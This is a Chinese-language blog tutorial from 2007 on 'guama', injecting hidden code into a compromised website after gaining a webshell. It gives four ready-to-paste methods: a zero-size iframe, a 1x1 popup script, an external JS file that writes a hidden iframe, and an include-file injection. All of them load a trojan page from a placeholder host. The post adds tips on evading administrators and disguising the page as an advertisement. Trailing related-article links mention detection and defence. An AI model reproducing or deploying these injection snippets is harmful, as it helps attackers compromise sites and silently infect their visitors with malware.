教你如何挂马

原创 2007年10月09日 18:55:00

教你如何挂马

方法一:

一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 :
<html>
<iframe src="http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>

把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>
http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。

方法二:

<SCRIPT language=javascript>   
window.open("http://192.168.1.3/inc/joke.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1"); 
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了,flash木马也很厉害的哦。

方法三:

还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src=’
http://192.168.1.3/inc/joke.htm’ name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............

方法四:
代码加进包含文件<!--#include file="conn.asp"-->

 

如何进行网站挂马检测与清除

  • 2013年09月13日 15:28
  • 834KB
  • 下载

教你如何反击令人防不胜防的JS挂马(图).php

  • 2009年02月05日 15:31
  • 26KB
  • 下载

十种常用的网页挂马方法(附源代码)

一:框架挂马    二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为    三:js变形加密 ...
  • a771948524
  • a771948524
  • 2013-05-27 16:02:19
  • 3342

如何防止网站被人挂马

怎样防止企业网站被挂马是每一个网站管理者所要必须面对的,在这里我们给大家提供七招来屏蔽网站被挂马的主要途径,解决了这个问题也就解决了网站的安全问题。     第一招,黑客一般给你放马,都是通过工具...
  • hxf1128447
  • hxf1128447
  • 2016-07-28 10:41:11
  • 247

寻找PHP(网站)挂马,后门

一 php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代...
  • MiltonZhong
  • MiltonZhong
  • 2013-08-02 15:29:40
  • 2903

网页挂马抓鸡详细教程

  • 2011年03月20日 14:55
  • 9.79MB
  • 下载

常见JS挂马方法及如何防止网站被黑客挂马?

最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定。可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因。最后发现是网站被挂马了,导致网站被连累了。在此,借助seo思维博客的平台...
  • z10160
  • z10160
  • 2013-09-22 08:02:16
  • 2499

最有效的防止服务器被挂马的方法

服务器有上传漏洞,常规的办法是设置存放文件的文件夹的权限为禁止运行,但对虚拟主机管理员来说很难,因为你不知道用户上传的网站中哪个文件夹是用来存放上传文件的。有没有更好的办法呢?相信所有的网站服务器都有...
  • cncco
  • cncco
  • 2009-06-06 15:48:00
  • 1737

查出Linux下网站哪些文件被挂马的办法

转自:http://www.iamle.com/archives/1557.html 2014-03-24 BY WWEK php后门木马常用的函数大致上可分为四种类型: 1. 执...
  • lanyd
  • lanyd
  • 2017-02-10 22:19:51
  • 750
收藏助手
不良信息举报
您举报文章:教你如何挂马
举报原因:
原因补充:

(最多只允许输入30个字)